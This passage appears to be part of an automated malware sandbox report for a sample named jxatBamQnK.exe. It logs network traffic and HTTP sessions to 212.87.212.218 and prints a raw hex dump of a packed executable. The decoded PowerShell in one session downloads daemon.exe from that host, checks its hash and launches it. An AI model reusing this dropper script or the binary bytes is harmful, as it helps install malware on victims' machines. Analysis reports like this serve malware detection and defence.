                                                                                                          Aug 13, 2022 09:09:05.006325960 CEST49815443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:09:05.006373882 CEST49815443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:09:05.006382942 CEST4434981520.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:09:05.006628990 CEST49815443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:09:05.035527945 CEST4434981520.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:09:05.035614967 CEST4434981520.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:09:05.035698891 CEST49815443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:09:05.035821915 CEST49815443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:09:05.035837889 CEST4434981520.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:09:10.215104103 CEST4976480192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:09:10.232290030 CEST8049764212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:09:15.579976082 CEST804970593.184.220.29192.168.2.7
                                                                                                          Aug 13, 2022 09:09:15.580080986 CEST4970580192.168.2.793.184.220.29
                                                                                                          Aug 13, 2022 09:09:22.288131952 CEST44349810104.140.201.42192.168.2.7
                                                                                                          Aug 13, 2022 09:09:22.346168041 CEST49810443192.168.2.7104.140.201.42
                                                                                                          Aug 13, 2022 09:09:40.319237947 CEST4976480192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:09:40.336415052 CEST8049764212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.450462103 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.450515032 CEST4434981620.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.450654030 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.451366901 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.451379061 CEST4434981620.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.542571068 CEST4434981620.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.542797089 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.546119928 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.546138048 CEST4434981620.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.546500921 CEST4434981620.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.547875881 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.547933102 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.547943115 CEST4434981620.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.548115015 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.575551987 CEST4434981620.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.575654030 CEST4434981620.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:09:42.575757027 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.575968027 CEST49816443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:09:42.575983047 CEST4434981620.199.120.85192.168.2.7

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Aug 13, 2022 09:07:09.817795992 CEST138138192.168.2.7192.168.2.255

                                                                                                          ICMP Packets

                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                          Aug 13, 2022 09:07:36.718976021 CEST192.168.2.7192.168.2.1c6c5Echo
                                                                                                          Aug 13, 2022 09:07:36.719028950 CEST192.168.2.1192.168.2.7cec5Echo Reply
                                                                                                          Aug 13, 2022 09:07:37.276804924 CEST192.168.2.7192.168.2.255c6c5Echo
                                                                                                          Aug 13, 2022 09:07:40.687762976 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                                                                                          Aug 13, 2022 09:07:40.760195971 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                                                                                          Aug 13, 2022 09:07:40.761708021 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                                                                                          Aug 13, 2022 09:07:40.762442112 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                                                                                          Aug 13, 2022 09:07:40.764209032 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                                                                                          Aug 13, 2022 09:07:40.766797066 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                                                                                          Aug 13, 2022 09:07:43.791088104 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                                                                                          Aug 13, 2022 09:07:43.791098118 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                                                                                          Aug 13, 2022 09:07:43.817923069 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • arc.msn.com
                                                                                                          • login.live.com
                                                                                                          • www.bing.com
                                                                                                          • 212.87.212.218

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.74971820.82.209.183443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.74971920.82.209.183443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          10192.168.2.74977520.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          11192.168.2.74977820.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          12192.168.2.749776204.79.197.200443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          13192.168.2.749777204.79.197.200443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          14192.168.2.74977920.82.210.154443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          15192.168.2.74978020.82.210.154443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          16192.168.2.74978120.82.210.154443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          17192.168.2.74978220.82.210.154443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          18192.168.2.74978320.199.120.182443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          19192.168.2.74978420.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.74976520.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          20192.168.2.74980720.199.120.85443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          21192.168.2.74980920.199.120.182443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          22192.168.2.749810104.140.201.42443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          23192.168.2.74981120.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          24192.168.2.74981220.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          25192.168.2.74981320.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          26192.168.2.74981420.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          27192.168.2.74981520.199.120.182443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          28192.168.2.74981620.199.120.85443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          29192.168.2.749760212.87.212.21880C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:06:53.051124096 CEST924OUTGET /encrypt.exe HTTP/1.1
                                                                                                          Host: 212.87.212.218
                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                          Accept-Encoding: gzip
                                                                                                          Aug 13, 2022 09:07:23.522505999 CEST9977OUTData Raw: 00
                                                                                                          Data Ascii:
                                                                                                          Aug 13, 2022 09:07:53.635195017 CEST12634OUTData Raw: 00
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.74976620.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          30212.87.212.21880192.168.2.749760C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:06:53.070255041 CEST926INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Sat, 13 Aug 2022 07:06:53 GMT
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Length: 1996800
                                                                                                          Last-Modified: Tue, 26 Jul 2022 11:35:52 GMT
                                                                                                          Connection: keep-alive
                                                                                                          ETag: "62dfd198-1e7800"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 ee 50 00 00 00 00 00 f0 00 22 02 0b 02 03 00 00 80 1e 00 00 10 00 00 00 60 39 00 a0 e0 57 00 00 70 39 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 00 58 00 00 10 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f0 57 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 60 39 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 80 1e 00 00 70 39 00 00 74 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 f0 57 00 00 02 00 00 00 76 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 36 00 55 50 58 21 0d 24 08 0a b8 4d bf b3 6a 94 e8 51 ae c8 57 00 72 70 1e 00 00 f0 50 00 49 5a 00 ce ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 38 75 67 6a 77 5f 56 72 4f 73 4f 75 78 63 36 42 ff ff ff ff 31 52 4a 52 2f 48 4f 65 48 77 73 37 4e 2d 55 31 4d 69 58 65 4f 4a 69 4d 6d 2f 44 62 67 69 64 68 ff ff ff ff 6a 69 78 4b 42 42 71 53 73 38 54 56 77 53 2f 58 4a 6a 31 55 49 39 65 46 77 37 4a 64 70 7a 77 77 ff 0f 21 ff 71 74 39 22 0a 20 ff cc 49 3b 66 10 76 38 48 83 ec 18 48 ff 6f de fd 89 6c 24 10 48 8d 09 89 44 24 20 5c 24 28 66 90 e8 5a 00 07 1c 48 8b de 99 ef 74 21 8b 1c 00 dc 53 83 c4 18 c3 74 67 ab 54 08 10 30 05 fd 1d 8b 6f 9f 7f fb eb a7 c9 4c 8d 64 24 d8 4d 0f 86 74 06 e3 48 81 7e d2 dd da ec a8 82 00 64 ac 24 a0 0f 8d 89 84 24 b0 7d 7b bb 7d eb 06 12 f0 4c 89 ae 85 db 0f 84 5e 03 3a 31 c9 e9 6f ff 76 bf 0c 04 ad 48 c7 c1 ff 00 2c c9 7d 0e 45 31 c0 31 f6 4c d9 eb 31 0f 73 db de db 1f 40 72 39 d9 0f 87 b2 da 94 71 01 18 f3 0f 82 f8 db 7f fb cf 48 29 cb 1e 7b ff 49 89 f8 48 f7 df 48 76 3f 48 21 fe 48 01 c6 e9 da ff 2f 66 f9 04 7c 9d 81 38 63 70 75 2e 75 95 31 d2 80 00 bd ca 9a 1d fc a5 c2 89 74 24 70 4c a4 50 d0 36 8c 7d db a5 dd 32 02 e6 90 be ca c1 76 fa 04 b9 b1 b0 3d 48 b3 b2 7a fc f9 83 e7 04 22 1c 38 74 b8 7d 5f d0 52 01 4c 39 d1 45 a9 88 4c 24 48 2f 60 ff ff bb 15 12 d1 32 59 ff 4c 16 18 4d 89 dc 49 f7 db 49 c1 fb 3f 4d 21 da 4e ff ff a0 6b 66 10 2b 58 28 03 75 0f 46 0f b7 14 10 66 41 81 fa 6f 6e f6 95 e7 f7 74 21 eb 66 28 04 75 60 2c fd 6f 66 75 53 18 e5 f9 d6 fe b6 54 10 02 41 80 fa 16 47 66 fa 07 75 29 44 38 5f d1 7e 7b 61 6c 75 1c 3a 7c 38 02 40 80 ff 14 11 02 3d ad c2 4f 00 3d 0b 0e 0c 4e bf 1c 21 48
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdP"`9Wp9@X` WUPX0`9UPX1p9t@UPX2Wv@3.96UPX!$MjQWrpPIZ Go build ID: "8ugjw_VrOsOuxc6B1RJR/HOeHws7N-U1MiXeOJiMm/DbgidhjixKBBqSs8TVwS/XJj1UI9eFw7Jdpzww!qt9" I;fv8HHol$HD$ \$(fZHt!StgT0oLd$MtH~d$$}{}L^:1ovH,}E11L1s@r9qH){IHHv?H!H/f|8cpu.u1t$pLP6}2v=Hz"8t}_RL9EL$H/`2YLMII?M!Nkf+X(uFfAont!f(u`,ofuSTAGfu)D8_~{alu:|8@=O=N!H
                                                                                                          Aug 13, 2022 09:06:53.070300102 CEST927INData Raw: 40 6b 60 b7 b3 2a 15 97 16 54 24 38 34 ef eb 3e 8b bf e0 8a 6e 03 67 3c 7e 05 97 d9 26 00 bb 10 04 ef 55 5a 7c 20 70 3c 91 58 18 1d 3e 92 a4 32 20 cd 5a 27 20 60 48 58 17 e4 1d eb 94 7e 02 ab bc 3e 51 79 70 3a 9d 8b 08 01 0c 20 03 f2 0e eb 61 68
                                                                                                          Data Ascii: @k`*T$84>ng<~&UZ| p<X>2 Z' `HX~>Qyp: ah#a!hA* {e3~P(t; xA$CH[x$VtyH>t ur.Hp$s"p@'BCrz8uBS
                                                                                                          Aug 13, 2022 09:06:53.070339918 CEST929INData Raw: da 6d 01 68 2c d1 ea 08 41 e0 82 ed d8 10 13 20 9e 04 11 32 e0 7f c3 54 1e 0e 71 ff 0f f8 46 48 40 c5 df 1b ce 09 4d 89 7c 24 68 31 d2 45 4a ab 51 f0 f6 17 4d 8d 9c 44 69 d2 93 d2 01 52 1c 07 db f0 4d f8 43 8d 14 13 4d 86 39 c6 7f e4 49 32 41 b9
                                                                                                          Data Ascii: mh,A 2TqFH@M|$h1EJQMDiRMCM9I2A3+E+VE"i01L^Ei7D,0G,LI9~!x@w`.#z81A`7D$YA9uD{lDZJG,`L.8Dg d@dH
                                                                                                          Aug 13, 2022 09:06:53.070451021 CEST930INData Raw: 8e 1c 1c 2c 34 e6 1f 04 20 41 ba 4b 04 09 2c af 03 c9 54 3c 38 74 b9 0d 7f e3 19 16 74 05 c0 93 03 5c 3e 1d 50 74 8a 44 ac b8 5e 2e 4e 4c 8d 44 15 bc 7f ed f2 fe 52 3a 59 18 79 12 40 47 a6 88 5f 98 d2 2e 68 25 4d 06 56 10 51 e5 59 79 08 5f 66 20
                                                                                                          Data Ascii: ,4 AK,T<8tt\>PtD^.NLDR:Yy@G_.h%MVQYy_f ovy^=<W@t*r=<GV_Zttw^tR9tZ\$7H45H4H)~{uSY;?ZA
                                                                                                          Aug 13, 2022 09:06:53.070497990 CEST931INData Raw: 78 6b ab 95 b2 83 7e 0f 25 6d b5 2b 69 22 63 28 bc 1c 3a 10 8e ac 10 68 42 48 9e d6 0a 08 71 06 1f 7c 46 5b 80 5e 3d 40 db a9 48 e0 48 d2 60 3c 2b f8 e8 78 7c a0 fb 26 02 31 6c 0d 23 51 58 7b e5 27 8e ad 30 b2 5c db d4 3a 73 18 c1 04 38 da 6b a1
                                                                                                          Data Ascii: xk~%m+i"c(:hBHq|F[^=@HH`<+x|&1l#QX{'0\:s8k#t0@h^~TsXA+<to0#T8AxN8cJ@V+BXu-?p> Hmw;Lj`uxw`P+%.48?f9A8#^;>g&VC
                                                                                                          Aug 13, 2022 09:06:53.070540905 CEST933INData Raw: 29 1e 85 83 c9 04 57 37 04 cf c1 06 47 9a 10 00 83 bd 42 4f 61 9d 58 10 8d 54 c7 fe 33 b7 0e ff d6 c3 e1 f6 c1 04 74 1e 83 e1 fb 6d 8b f3 ad ab bd 94 93 0e 02 60 d0 45 02 74 1d 1f 8b 0c 48 fd b0 43 01 74 0c e9 f4 c2 35 fe 3b d0 06 bc 45 c0 e0 32
                                                                                                          Data Ascii: )W7GBOaXT3tm`EtHCt5;E2.c$Y>6ZuWW?zL*/f MuhB5<Vxy<L^M9,$u$$&1!vmJ [8h5rQ8lw~//5sgwy
                                                                                                          Aug 13, 2022 09:06:53.070579052 CEST934INData Raw: c4 41 5f d7 21 d7 c0 db d7 8b 63 8b fc eb 90 c8 0a 8c 01 51 b4 1c 3b 3e 03 1d 08 ff 18 40 2b 94 4a 65 01 12 ec 78 70 70 a4 01 7e 2d fe dd 74 25 65 41 37 04 a6 36 df 11 75 0f 02 1b 02 e6 58 80 b9 3f ad 33 74 92 13 27 3f 8b 7e 39 2d 7a 24 39 80 54
                                                                                                          Data Ascii: A_!cQ;>@+Jexpp~-t%eA76uX?3t'?~9-z$9TG>/ptx@u0F\Pzh=GXL`"Ki^\T]IM)<X!'z^>>C0i6ASNa:V@Jj&>v<50ktP
                                                                                                          Aug 13, 2022 09:06:53.070674896 CEST936INData Raw: 77 68 34 e7 f7 ed f5 fa 88 1d 70 d8 4c d9 10 42 7c a3 c6 46 be 03 3f e0 44 23 59 56 49 3c d7 83 79 24 cd 0e 54 1c 11 b8 28 e1 19 be 81 1b e1 a6 ed 03 0f 8f 2c 17 58 10 e4 f9 46 48 ef 1b 4b 72 e4 0d 4e 7e 4e 62 74 dd 8e 2d c4 14 61 21 88 11 9c e4
                                                                                                          Data Ascii: wh4pLB|F?D#YVI<y$T(,XFHKrN~Nbt-a!WB5+QHWnAX/?"J6StO{DBfx@TJ|Bq$k*D"/|#}nd*f+D=)YA5y(+)8A(c4JZYy-8{qq
                                                                                                          Aug 13, 2022 09:06:53.070714951 CEST937INData Raw: 4b 34 a7 bf 7d ff 96 5c 90 69 7a 28 14 ad 25 70 94 19 39 e4 19 70 78 98 70 a1 05 f2 49 9a 56 fc 25 0a 2d 59 c6 64 e1 85 69 49 ac 0a 7b ff 4f e3 41 51 68 7f 58 98 cb 95 71 71 07 7c 4a 74 9c 81 78 84 40 d1 2b 7f 57 e1 43 bd 19 23 a2 ff 4a fc 23 de
                                                                                                          Data Ascii: K4}\iz(%p9pxpIV%-YdiI{OAQhXqq|Jtx@+WC#J#=<C7P0D@I52&&Mspc7@KK#CT0H0oEY0B(!xcCTeZGs +@@f@@ X(8D)0?99@q;%_TiqLv
                                                                                                          Aug 13, 2022 09:06:53.070828915 CEST938INData Raw: 37 10 4a 06 00 57 44 84 be 33 c8 25 06 18 a1 01 ac 33 32 8e 15 7f 73 01 c9 c6 88 b0 bc 26 28 d1 52 15 b6 44 59 1d d9 86 8b 6e 08 e2 bf 4d bf c1 ae 6f 24 be 80 9c 75 2c 23 59 ad d0 a2 20 43 7c 5e 2d 0d 09 a6 23 1e 24 f3 79 38 31 1d 68 06 a6 3f 68
                                                                                                          Data Ascii: 7JWD3%32s&(RDYnMo$u,#Y C|^-#$y81h?h8|Hx<jwHRx-/7upL}6Z9>!A!GLiDyHBFd"d!rH&BE!Cr2$y!C2A22$V C)Do?D~H8HBC>H dq@@DL
                                                                                                          Aug 13, 2022 09:06:53.090043068 CEST940INData Raw: 46 ea 03 24 92 49 d1 e4 4c 29 1a 83 fe 14 72 b0 9d dc 88 3a 35 2e 87 27 3f 73 34 e2 2d b0 21 c9 7a d5 48 29 f2 a0 14 68 60 db 7a c1 58 34 7e ec cc fb 49 0e 07 af 5d 5c 4c 21 fe 1a bc 49 7f 9b 87 f0 52 af 3f 47 70 54 2c 2f 1b ce 26 4e 20 01 be 22
                                                                                                          Data Ascii: F$IL)r:5.'?s4-!zH)h`zX4~I]\L!IR?GpT,/&N "L"MZIKB("gX51C+T97qR_e{"<?"ayH/I<M)tttgJ[r<3D(CH>(y8<-5(v'/


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          31192.168.2.749761212.87.212.21880C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:06:58.552895069 CEST3034OUTGET /doanlowd.txt HTTP/1.1
                                                                                                          Host: 212.87.212.218
                                                                                                          Connection: Keep-Alive
                                                                                                          Aug 13, 2022 09:06:58.903072119 CEST3036OUTGET /daemon.exe HTTP/1.1
                                                                                                          Host: 212.87.212.218


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          32212.87.212.21880192.168.2.749761C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:06:58.572278023 CEST3036INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Sat, 13 Aug 2022 07:06:58 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 796
                                                                                                          Last-Modified: Mon, 08 Aug 2022 02:12:37 GMT
                                                                                                          Connection: keep-alive
                                                                                                          ETag: "62f07115-31c"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 24 69 73 45 78 69 73 74 3d 54 65 73 74 2d 50 61 74 68 20 2d 50 61 74 68 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 22 20 2d 50 61 74 68 54 79 70 65 20 4c 65 61 66 0d 0a 69 66 28 24 69 73 45 78 69 73 74 20 2d 6e 65 20 24 74 72 75 65 29 7b 0d 0a 09 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 46 69 6c 65 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2c 20 64 6f 77 6e 6c 6f 61 64 20 61 67 61 69 6e 20 20 20 20 22 0d 0a 20 20 20 20 28 6e 65 77 2d 6f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 32 31 32 2e 38 37 2e 32 31 32 2e 32 31 38 2f 64 61 65 6d 6f 6e 2e 65 78 65 27 2c 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 27 29 0d 0a 7d 0d 0a 24 66 69 6c 65 68 61 73 68 3d 47 65 74 2d 46 69 6c 65 48 61 73 68 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 20 2d 41 6c 67 6f 72 69 74 68 6d 20 4d 44 35 0d 0a 69 66 28 24 46 69 6c 65 48 61 73 68 2e 48 61 73 68 20 2d 6e 65 20 22 43 34 34 43 36 37 46 42 42 44 37 38 41 46 34 34 45 34 45 37 35 37 38 37 45 36 33 36 45 31 46 45 22 29 7b 0d 0a 09 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 68 61 73 68 20 65 72 72 6f 72 2c 20 64 6f 77 6e 6c 6f 61 64 20 61 67 61 69 6e 22 0d 0a 20 20 20 20 28 6e 65 77 2d 6f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 32 31 32 2e 38 37 2e 32 31 32 2e 32 31 38 2f 64 61 65 6d 6f 6e 2e 65 78 65 27 2c 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 27 29 0d 0a 7d 0d 0a 24 61 3d 47 65 74 2d 50 72 6f 63 65 73 73 0d 0a 24 62 3d 4f 75 74 2d 53 74 72 69 6e 67 20 2d 49 6e 70 75 74 4f 62 6a 65 63 74 20 24 61 2e 70 61 74 68 0d 0a 69 66 28 24 62 2e 63 6f 6e 74 61 69 6e 73 28 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 22 29 20 2d 6e 65 20 24 74 72 75 65 29 7b 0d 0a 09 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 50 72 6f 63 65 73 73 20 6e 6f 74 20 73 74 61 72 74 65 64 2c 20 73 74 61 72 74 20 70 72 6f 63 65 73 73 22 0d 0a 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 22 20 2d 4e 6f 4e 65 77 57 69 6e 64 6f 77 0d 0a 7d
                                                                                                          Data Ascii: $isExist=Test-Path -Path "C:\Windows\Temp\daemon.exe" -PathType Leafif($isExist -ne $true){Write-Output "File does not exist, download again " (new-object System.Net.WebClient).DownloadFile('http://212.87.212.218/daemon.exe','C:\Windows\Temp\daemon.exe')}$filehash=Get-FileHash C:\Windows\Temp\daemon.exe -Algorithm MD5if($FileHash.Hash -ne "C44C67FBBD78AF44E4E75787E636E1FE"){Write-Output "hash error, download again" (new-object System.Net.WebClient).DownloadFile('http://212.87.212.218/daemon.exe','C:\Windows\Temp\daemon.exe')}$a=Get-Process$b=Out-String -InputObject $a.pathif($b.contains("C:\Windows\Temp\daemon.exe") -ne $true){Write-Output "Process not started, start process" Start-Process -FilePath "C:\Windows\Temp\daemon.exe" -NoNewWindow}
                                                                                                          Aug 13, 2022 09:06:58.920589924 CEST3037INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Sat, 13 Aug 2022 07:06:58 GMT
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Length: 1699840
                                                                                                          Last-Modified: Mon, 08 Aug 2022 02:07:13 GMT
                                                                                                          Connection: keep-alive
                                                                                                          ETag: "62f06fd1-19f000"
                                                                                                          Accept-Ranges: bytes
